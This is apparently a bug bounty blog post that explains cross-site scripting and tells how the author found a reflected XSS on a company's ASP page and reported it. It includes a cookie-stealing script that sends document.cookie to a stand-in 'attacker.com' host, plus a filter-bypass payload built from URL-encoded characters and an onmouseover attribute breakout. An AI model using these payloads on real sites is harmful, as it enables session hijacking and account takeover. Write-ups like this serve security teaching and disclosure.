This article was originally published at FaiyazHacks

Hi everyone, I hope you all are doing well and great! In this article we are going to talk about a weird xss that i found in one of the most famous energy drinks company(you might have guessed it)

Contents of this article:

1- What is XSS?

2- Story of Weird XSS.

So let’s begin our hacking journey.

WHAT IS XSS?

Have you ever heard the term “Javascript”? If yes then good but if not then it is nothing but a programming language most commonly used at client side(Browsers like Firefox, Chrome etc). You all must have visited websites that have very fancy looks, animation, etc. Well, these things are possible because of javascript. It can control the whole webpage and manipulate it as per the developer’s choice!

It is very good for developers since they can add more design, functionalities etc with ease via Javascript. But ask yourself, what do you think will happen if someone else(attacker) will be able to write their own javascript code into other’s website?

Then that particular user can manipulate someone’s website without authorization and can change anything or do any thing on the webpage.

Well, this is how cross site scripting works.

In general terms, CROSS SITE SCRIPTING(XSS) is a web app vulnerability that allows attacker to inject their own malicious code into the web application.

Now by achieving xss, the attacker can:

1- Change the content of the page.

2- Steal cookies.

3- Redirect Users.

4- Deliver Malwares

and so on…

Let’s see one example:

#Example:

Suppose Facebook’s comment functionality is vulnerable to xss. Now the attacker visited some famous personality’s page(let’s say Ronaldo) and in his latest post, he commented:

<script>document.location.href=”https://attacker.com/?cookie=” + document.cookie</script>

Now this code will send every person’s cookies who visited Ronaldo’s post to the attacker. And by using that cookies, the attacker can now have full control over the victims account.

In this case, everyone who sees Ronaldo’s latest post will become a victim of the attacker and will lose their account to the attacker. And since Ronaldo is a very famous personality, the attacker can hack at least 10 MILLION users by just using the script above!!!!!!!!

Now i hope that you understood about what is xss and why it is one of the most dangerous vulnerability out there.

To learn more about xss, you can click here

STORY OF THE ENCODED XSS

In the month of September, i started hunting on a private bug bounty program that has everything is in scope. So i began my recon process and started looking for some common vulnerabilities like Open Redirection, CSRF, etc. In 2–3 days i founded 9 vulnerabilities in the Company and reported all of them. But unfortunately all of them was flagged either as Duplicate or Not Applicable.

On the next day, I started testing a new web application which was running on ASP server. I tried to find some hidden parameters using some tools like FFUF and Paramspider and found a menuid parameter. I captured the request in the burpsuite and tried injecting a normal <script>alert(1)</script> tag but it was protected and it redirected me to NotFound.aspx page. I was about to give up but then i thought of only add <> in parameter’s value but the result was still the same

Then i thought let’s URL Encode the special characters and see what happens after. I encoded < to %3c and > to %3e and to my surprise it got rendered!!

Then i tried to inject <script>alert(1)</script> but it didn’t work. It seems like the back end was checking some of the harmful tags to prevent xss. After sometime, i found that when i add “/” in the payload, it triggers the WAF and redirects me to the NotFound page.

On digging deeper, I found that the payload was reflecting in the div tag. Something like this:

<div menuid=”reflected_data”></div>

Then i tried to check what values are reflected on the page and i found:

“” → Reflected

<> → Reflected

/ → Blocked

<anything between tags> → Blocked

<anything → Reflected

>anything → Reflected

By analyzing the web page behavior, I concluded that we cannot use any tags since it will block us right away. So our only target is javascript events like onmouseover, onclick etc

So i crafted the payload below using the above information:

batman“ onmouseover=alert(1)>

so if i pass this value in the parameter it will close the string and allowing me to add a event like this:

<div menuid=”batman” onmouseover=alert(1)> ”> </div>

And BOOM! It was reflected and i got the SCARY ALERT 1 POP UP!

Image Source: Medium

I reported this issue to the company right away and in gratitude, they rewarded my with 1 tray of their energy drinks !!

Takeaways:

1- Never give up.

2- Analyze the web response and attack according to it.

3- Follow the road less traveled.

4- Never stop learning.

5- Try to add special characters and see the response.

That’s it for this article. I hope that you learnt something new from it. Let me know if you guys have any doubts regarding this article or XSS

We’ll meet again in next article. Till then

DOWNLOAD HERE:

If you want to test out this scenario yourself, then follow the steps below:

1. Download the file from here
2. Extract the files.
3. Install NodeJS on your Kali Linux Machine by typing sudo apt install nodejs -y
4. After installation, type node index.js in your terminal in the lab's directory.
5. Find your ip address by typing "ifconfig".
6. You can now access the lab by typing your IP address in the browser.